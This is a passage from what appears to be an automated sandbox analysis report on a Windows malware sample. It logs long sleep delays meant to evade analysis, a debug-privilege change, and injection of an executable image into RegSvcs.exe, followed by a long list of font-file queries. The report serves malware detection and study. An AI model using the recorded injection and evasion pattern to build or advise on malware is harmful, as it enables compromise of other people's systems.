                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 72F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 82F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 84A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: 94A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1981Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7821Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exe TID: 2380Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: RegSvcs.exe, 00000003.00000002.1991614742.00000000009AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7CC008Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Users\user\Desktop\MfzXU6tKOq.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
